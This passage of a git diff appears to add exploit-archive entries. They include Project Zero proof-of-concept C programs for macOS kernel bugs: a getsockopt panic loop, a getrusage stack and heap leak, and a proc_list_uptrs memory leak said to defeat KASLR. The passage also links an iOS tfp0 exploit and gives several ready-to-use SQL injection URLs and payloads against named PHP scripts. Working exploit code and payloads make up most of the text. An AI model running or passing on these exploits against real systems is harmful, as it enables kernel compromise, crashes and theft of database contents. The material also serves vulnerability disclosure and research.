the right spots). + +============== +*/ + +#include +#include +#include +#include +#include + +#define SO_NECP_ATTRIBUTES 0x1109 + +int main(void) { + while (1) { + int s = socket(AF_UNIX, SOCK_STREAM, 0); + if (s == -1) + err(1, "socket"); + getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL); + close(s); + } +} +/* +============== + +On macOS 10.13 (17A405), this causes the following crash: + +============== +*** Panic Report *** +panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers: +CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0 +RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc +RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8 +R8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246 +R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8 +RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010 +Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1 +============== + +This bug should be usable for disclosing kernel memory. +*/ \ No newline at end of file diff --git a/exploits/macos/dos/43319.c b/exploits/macos/dos/43319.c new file mode 100644 index 000000000..ffe1a7ee0 --- /dev/null +++ b/exploits/macos/dos/43319.c @@ -0,0 +1,201 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405 + +For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: + +int +getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) +{ + struct rusage *rup, rubuf; + struct user64_rusage rubuf64; + struct user32_rusage rubuf32; + size_t retsize = sizeof(rubuf); // default: 32 bits + caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits + struct timeval utime; + struct timeval stime; + + + switch (uap->who) { + case RUSAGE_SELF: + calcru(p, &utime, &stime, NULL); + proc_lock(p); + rup = &p->p_stats->p_ru; + rup->ru_utime = utime; + rup->ru_stime = stime; + + rubuf = *rup; + proc_unlock(p); + + break; + [...] + } + if (IS_64BIT_PROCESS(p)) { + retsize = sizeof(rubuf64); + retbuf = (caddr_t)&rubuf64; + munge_user64_rusage(&rubuf, &rubuf64); + } else { + [...] + } + + return (copyout(retbuf, uap->rusage, retsize)); +} + +`munge_user64_rusage()` performs the conversion by copying individual fields: + +__private_extern__ void +munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) +{ + // timeval changes size, so utime and stime need special handling + a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; + a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; + a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; + a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; +[...] +} + +`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: + +#define _STRUCT_USER64_TIMEVAL struct user64_timeval +_STRUCT_USER64_TIMEVAL +{ + user64_time_t tv_sec; // seconds + __int32_t tv_usec; // and microseconds +}; + +struct user64_rusage { + struct user64_timeval ru_utime; // user time used + struct user64_timeval ru_stime; // system time used + user64_long_t ru_maxrss; // max resident set size +[...] +}; + +This padding is not initialized, but is copied to userspace. + + +The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. + + +Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers. +The returned data seems to come from the previous syscall: + +$ cat test.c +#include +#include +#include +#include +#include +#include + +void do_leak(void) { + static struct rusage ru; + getrusage(RUSAGE_SELF, &ru); + static unsigned int leak1, leak2; + memcpy(&leak1, ((char*)&ru)+12, 4); + memcpy(&leak1, ((char*)&ru)+28, 4); + printf("leak1: 0x%08x\n", leak1); + printf("leak2: 0x%08x\n", leak2); +} + +int main(void) { + do_leak(); + do_leak(); + do_leak(); + int fd = open("/dev/null", O_RDONLY); + do_leak(); + int dummy; + read(fd, &dummy, 4); + do_leak(); + return 0; +} +$ gcc -o test test.c && ./test +leak1: 0x00000000 +leak2: 0x00000000 +leak1: 0xffffff80 +leak2: 0x00000000 +leak1: 0xffffff80 +leak2: 0x00000000 +leak1: 0xffffff80 +leak2: 0x00000000 +leak1: 0xffffff81 +leak2: 0x00000000 + + +However, I believe that this can also be used to disclose kernel heap memory. +When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack +without zeroing it, so the new stack contains data from previous heap allocations. +The following testcase, when run after repeatedly reading a wordlist into memory, +leaks some non-pointer data that seems to come from the wordlist: + +$ cat forktest.c +*/ + +#include +#include +#include +#include +#include +#include + +void do_leak(void) { + static struct rusage ru; + getrusage(RUSAGE_SELF, &ru); + static unsigned int leak1, leak2; + memcpy(&leak1, ((char*)&ru)+12, 4); + memcpy(&leak2, ((char*)&ru)+28, 4); + char str[1000]; + if (leak1 != 0) { + sprintf(str, "leak1: 0x%08x\n", leak1); + write(1, str, strlen(str)); + } + if (leak2 != 0) { + sprintf(str, "leak2: 0x%08x\n", leak2); + write(1, str, strlen(str)); + } +} + +void leak_in_child(void) { + int res_pid, res2; + asm volatile( + "mov $0x02000002, %%rax\n\t" + "syscall\n\t" + : "=a"(res_pid), "=d"(res2) + : + : "cc", "memory", "rcx", "r11" + ); + //write(1, "postfork\n", 9); + if (res2 == 1) { + //write(1, "child\n", 6); + do_leak(); + char dummy; + read(0, &dummy, 1); + asm volatile( + "mov $0x02000001, %rax\n\t" + "mov $0, %rdi\n\t" + "syscall\n\t" + ); + } + //printf("fork=%d:%d\n", res_pid, res2); + int wait_res; + //wait(&wait_res); +} + +int main(void) { + for(int i=0; i<1000; i++) { + leak_in_child(); + } +} +/* +$ gcc -o forktest forktest.c && ./forktest +leak1: 0x1b3b1320 +leak1: 0x00007f00 +leak1: 0x65686375 +leak1: 0x410a2d63 +leak1: 0x8162ced5 +leak1: 0x65736168 +leak1: 0x0000042b + +The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist. + + +Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. +*/ \ No newline at end of file diff --git a/exploits/macos/dos/43321.c b/exploits/macos/dos/43321.c new file mode 100644 index 000000000..437aad013 --- /dev/null +++ b/exploits/macos/dos/43321.c @@ -0,0 +1,235 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1372 + +the kernel libproc API proc_list_uptrs has the following comment in it's userspace header: + +/* + * Enumerate potential userspace pointers embedded in kernel data structures. + * Currently inspects kqueues only. + * + * NOTE: returned "pointers" are opaque user-supplied values and thus not + * guaranteed to address valid objects or be pointers at all. + * + * Returns the number of pointers found (which may exceed buffersize), or -1 on + * failure and errno set appropriately. + + +This is a recent addition to the kernel, presumably as a debugging tool to help enumerate +places where the kernel is accidentally disclosing kernel pointers to userspace. + +The implementation currently enumerates kqueues and dumps a bunch of values from them. + +Here's the relevant code: + +// buffer and buffersize are attacker controlled + +int +proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval) +{ + uint32_t count = 0; + int error = 0; + void *kbuf = NULL; + int32_t nuptrs = 0; + + if (buffer != USER_ADDR_NULL) { + count = buffersize / sizeof(uint64_t); <---(a) + if (count > MAX_UPTRS) { + count = MAX_UPTRS; + buffersize = count * sizeof(uint64_t); + } + if (count > 0) { + kbuf = kalloc(buffersize); <--- (b) + assert(kbuf != NULL); + } + } else { + buffersize = 0; + } + + nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize); + + if (kbuf) { + size_t copysize; + if (os_mul_overflow(nuptrs, sizeof(uint64_t), ©size)) { <--- (c) + error = ERANGE; + goto out; + } + if (copysize > buffersize) { <-- (d) + copysize = buffersize; + } + error = copyout(kbuf, buffer, copysize); <--- (e) + } + + +At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's +which can fit in there. + +If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b). + +kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of +kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger +than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf. + +This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf +but how many *could* have been written had the buffer been big enough. + +If there were possible values which could have been written than there was space in the buffer then at (d) copysize +will be limited down to buffersize. + +Copysize is then used at (e) to copy the contents of kbuf to userspace. + +The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1 +as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes. + +If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will +only write to the first value to kbuf, leaving the last 7 bytes untouched. + +At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15) +and at (e) 15 bytes will be copied back to userspace even though only 8 were written to. + +Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit +limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr. + +This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory. + +Tested on MacOS 10.13 High Sierra (17A365) +*/ + +// ianbeer + +#if 0 +XNU kernel memory disclosure due to bug in kernel API for detecting kernel memory disclosures + +the kernel libproc API proc_list_uptrs has the following comment in it's userspace header: + +/* + * Enumerate potential userspace pointers embedded in kernel data structures. + * Currently inspects kqueues only. + * + * NOTE: returned "pointers" are opaque user-supplied values and thus not + * guaranteed to address valid objects or be pointers at all. + * + * Returns the number of pointers found (which may exceed buffersize), or -1 on + * failure and errno set appropriately. + */ + +This is a recent addition to the kernel, presumably as a debugging tool to help enumerate +places where the kernel is accidentally disclosing kernel pointers to userspace. + +The implementation currently enumerates kqueues and dumps a bunch of values from them. + +Here's the relevant code: + +// buffer and buffersize are attacker controlled + +int +proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval) +{ + uint32_t count = 0; + int error = 0; + void *kbuf = NULL; + int32_t nuptrs = 0; + + if (buffer != USER_ADDR_NULL) { + count = buffersize / sizeof(uint64_t); <---(a) + if (count > MAX_UPTRS) { + count = MAX_UPTRS; + buffersize = count * sizeof(uint64_t); + } + if (count > 0) { + kbuf = kalloc(buffersize); <--- (b) + assert(kbuf != NULL); + } + } else { + buffersize = 0; + } + + nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize); + + if (kbuf) { + size_t copysize; + if (os_mul_overflow(nuptrs, sizeof(uint64_t), ©size)) { <--- (c) + error = ERANGE; + goto out; + } + if (copysize > buffersize) { <-- (d) + copysize = buffersize; + } + error = copyout(kbuf, buffer, copysize); <--- (e) + } + + +At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's +which can fit in there. + +If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b). + +kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of +kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger +than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf. + +This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf +but how many *could* have been written had the buffer been big enough. + +If there were possible values which could have been written than there was space in the buffer then at (d) copysize +will be limited down to buffersize. + +Copysize is then used at (e) to copy the contents of kbuf to userspace. + +The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1 +as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes. + +If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will +only write to the first value to kbuf, leaving the last 7 bytes untouched. + +At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15) +and at (e) 15 bytes will be copied back to userspace even though only 8 were written to. + +Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit +limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr. + +This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory. + +Tested on MacOS 10.13 High Sierra (17A365) +#endif + +#include +#include +#include +#include + +#define PRIVATE +#include + +uint64_t try_leak(pid_t pid, int count) { + size_t buf_size = (count*8)+7; + char* buf = calloc(buf_size+1, 1); + + int err = proc_list_uptrs(pid, (void*)buf, buf_size); + + if (err == -1) { + return 0; + } + + // the last 7 bytes will contain the leaked data: + uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc + + return last_val; +} + +int main(int argc, char** argv) { + for (int pid = 0; pid < 1000; pid++) { + for (int i = 0; i < 100; i++) { + uint64_t leak = try_leak(pid, i); + /* + if (leak != 0 && leak != 0x00adbeefdeadbeef) { + printf("%016llx\n", leak); + } + */ + if ((leak & 0x00ffffff00000000) == 0xffff8000000000) { + printf("%016llx\n", leak); + } + } + } + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/dos/43320.txt b/exploits/multiple/dos/43320.txt new file mode 100644 index 000000000..42f43fb64 --- /dev/null +++ b/exploits/multiple/dos/43320.txt @@ -0,0 +1,36 @@ +I have previously detailed the lifetime management paradigms in MIG in the writeups for: + CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926] +and + CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954] + +If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. +If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it. + +If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference +on that mach port passed to the external method will be managed by MIG semantics. If the external method returns +an error then MIG will assume that the reference was not consumed by the external method and as such the MIG +generated coode will drop a reference on the port. + +IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port +(via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered +a port with the same callback function. + +The external method's error return value propagates via the return value of is_io_connect_async_method back to the +MIG generated code which will drop a futher reference on the wake_port when only one was taken. + +This bug is reachable from the iOS app sandbox as demonstrated by this PoC. + +Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A) +Tested on MacOS 10.13 (17A365) on MacBookAir5,2 + +------------------------------------------------------ + +async_wake exploit attached. + +Gets tfp0 on all 64-bit devices plus an initial PoC local kernel debugger. + +See the README and kdbg.c for details. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43320.zip \ No newline at end of file diff --git a/exploits/php/webapps/43278.txt b/exploits/php/webapps/43278.txt new file mode 100644 index 000000000..e98f69f23 --- /dev/null +++ b/exploits/php/webapps/43278.txt @@ -0,0 +1,46 @@ +# # # # # +# Exploit Title: Entrepreneur Dating Script 2.0.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ +# Demo: http://198.38.86.159/~datingscript/ +# Version: 2.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search_result.php?marital=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 2) +# http://localhost/[PATH]/search_result.php?gender=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 3) +# http://localhost/[PATH]/search_result.php?country=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 4) +# http://localhost/[PATH]/search_result.php?profileid=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43287.txt b/exploits/php/webapps/43287.txt new file mode 100644 index 000000000..849a44143 --- /dev/null +++ b/exploits/php/webapps/43287.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Secure E-commerce Script 2.0.1 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/secure-e-commerce-script/ +# Version: 2.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/category.php?searchmain=[SQL]&searchcat=[SQL] +# http://localhost/[PATH]/single_detail.php?sid=[SQL] +# +# 1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+- +# +# http://server/category.php?searchmain=1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+- +# +# Parameter: searchmain (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: searchmain=1' AND 9950=9950 AND 'nOyB'='nOyB&searchcat=a +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43288.txt b/exploits/php/webapps/43288.txt new file mode 100644 index 000000000..a5727d2c6 --- /dev/null +++ b/exploits/php/webapps/43288.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Laundry Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/laundry-booking-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search= +# +# http://server/laundry-search/list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43289.txt b/exploits/php/webapps/43289.txt new file mode 100644 index 000000000..990ab1378 --- /dev/null +++ b/exploits/php/webapps/43289.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Lawyer Search Script 1.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/ +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/lawyer-list?city=[SQL]&main_search= +# +# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/lawyer-list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43290.txt b/exploits/php/webapps/43290.txt new file mode 100644 index 000000000..1bea50b61 --- /dev/null +++ b/exploits/php/webapps/43290.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Multivendor Penny Auction Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/penny-auction-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/detail/[SQL] +# +# -48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+- +# +# http://server/bidding/detail/-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43291.txt b/exploits/php/webapps/43291.txt new file mode 100644 index 000000000..1a76eb6ff --- /dev/null +++ b/exploits/php/webapps/43291.txt @@ -0,0 +1,37 @@ +# # # # # +# Exploit Title: Online Exam Test Application Script 1.6 - 'Exams.php 'sort' SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/online-exam-test-application/ +# Version: 1.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/exams.php?sort=[SQL] +# +# -4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+- +# +# http://server/exams.php?sort=-4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+- +# +# Parameter: sort (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: sort=4 AND 9300=9300 +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 6 columns +# Payload: sort=4 UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x436a5574724b7477565147546d496b47534c4e586c4275794c6359695374477874484b4669767978,0x7176627871),NULL,NULL,NULL,NULL-- Knya +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43292.html b/exploits/php/webapps/43292.html new file mode 100644 index 000000000..ef37c8d20 --- /dev/null +++ b/exploits/php/webapps/43292.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43293.txt b/exploits/php/webapps/43293.txt new file mode 100644 index 000000000..5aceeaa85 --- /dev/null +++ b/exploits/php/webapps/43293.txt @@ -0,0 +1,49 @@ +# # # # # +# Exploit Title: PHP Multivendor Ecommerce 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-multivendor-ecommerce/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single_detail.php?sid=[SQL] +# +# Parameter: sid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: sid=22 AND 4059=4059 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: sid=22 AND SLEEP(5) +# +# 2) +# http://localhost/[PATH]/category.php?searchcat=[SQL] +# +# Parameter: searchcat (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: searchcat=s%' AND 4309=4309 AND '%'=' +# +# 3) +# http://localhost/[PATH]/category.php?chid1=[SQL] +# +# Parameter: chid1 (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: chid1=46' AND SLEEP(5) AND 'DzvZ'='DzvZ +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43294.txt b/exploits/php/webapps/43294.txt new file mode 100644 index 000000000..778b8717d --- /dev/null +++ 